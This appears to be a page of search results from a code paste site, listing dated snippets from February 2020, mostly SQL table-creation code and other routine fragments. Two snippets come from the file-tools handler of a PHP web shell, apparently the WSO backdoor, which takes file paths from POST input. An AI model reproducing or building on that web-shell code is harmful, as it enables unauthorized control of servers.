42.7K results in 818 ms
5 years ago · Feb 27, 2020, 04:59 AM
copy_tables($S,$cj,$Zh){queries("SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO'");foreach($S as$Q){$B=($Zh==DB?table("copy_$Q"):idf_escape($Zh).".".table($Q));if(($_POST["overwrite"]&&!queries("\nDROP TABLE IF EXISTS $B"))||!queries("CREATE TABLE $B LIKE
5 years ago · Feb 27, 2020, 12:52 AM
EntIndexToEntRef(iEntity)); } else { LogError("ShowParticle: could not create info_particle_system"); } } /* StopParticle() ** ** Turns of
5 years ago · Feb 27, 2020, 12:34 AM
parent.connection self.cursor = parent.cursor sql = '''CREATE TABLE IF NOT EXISTS Face (ID INTEGER PRIMARY
5 years ago · Feb 27, 2020, 12:18 AM
parent.connection self.cursor = parent.cursor sql = '''CREATE TABLE IF NOT EXISTS Face (ID INTEGER PRIMARY
5 years ago · Feb 26, 2020, 11:12 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
5 years ago · Feb 26, 2020, 11:10 PM
parent.connection self.cursor = parent.cursor sql = '''CREATE TABLE IF NOT EXISTS Face (ID INTEGER PRIMARY
5 years ago · Feb 26, 2020, 11:08 PM
bool exists; FILE* ifp; exists = false; if ((ifp = fopen(filename, "r")) != NULL)
5 years ago · Feb 26, 2020, 10:48 PM
EntIndexToEntRef(iEntity)); } else { LogError("ShowParticle: could not create info_particle_system"); } } /* StopParticle() ** ** Turns of
5 years ago · Feb 26, 2020, 10:40 PM
health communities to counterweight if not flood the zone of
5 years ago · Feb 26, 2020, 10:20 PM
parent.connection self.cursor = parent.cursor sql = '''CREATE TABLE IF NOT EXISTS Face (ID INTEGER PRIMARY
5 years ago · Feb 26, 2020, 09:58 PM
local result, response = makeDirectory(path) if not (result) then log.fatal("Failed to create '" .. tostring(path) .. "' directory for '" .. tostring(fs.name(file.path))
5 years ago · Feb 26, 2020, 08:34 PM
parent.connection self.cursor = parent.cursor sql = '''CREATE TABLE IF NOT EXISTS Face (ID INTEGER PRIMARY
5 years ago · Feb 26, 2020, 08:16 PM
formatReadableSIUnit(num) -- pretty printLog() a table local function tprint (tbl, loglevel, indent) if not loglevel then loglevel = DEBUG
5 years ago · Feb 26, 2020, 08:02 PM
private val SQL_DELETE_ENTRIES = "DROP TABLE IF EXISTS" + DBContract.UserEntry.TABLE_NAME } } MainActivity.kt: package com.tutorialkart.sqlitetutorial
5 years ago · Feb 26, 2020, 07:48 PM
err; console.log("Connected!"); let createProjects = `create table if not exists projects( id int primary
5 years ago · Feb 26, 2020, 05:36 PM
CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; DROP TABLE IF EXISTS `users_permissions`; CREATE TABLE `users_permissions` ( `id` int(11) NOT NULL, `description` varchar(191) COLLATE
5 years ago · Feb 26, 2020, 05:28 PM
CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; DROP TABLE IF EXISTS `users_permissions`; CREATE TABLE `users_permissions` ( `id` int(11) NOT NULL, `description` varchar(191) COLLATE
5 years ago · Feb 26, 2020, 05:08 PM
task 1: DROP TABLE IF EXISTS airport; CREATE TABLE airport ( id int(11) NOT NULL PRIMARY KEY AUTO_INCREMENT,
5 years ago · Feb 26, 2020, 04:22 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
Total pages: 2134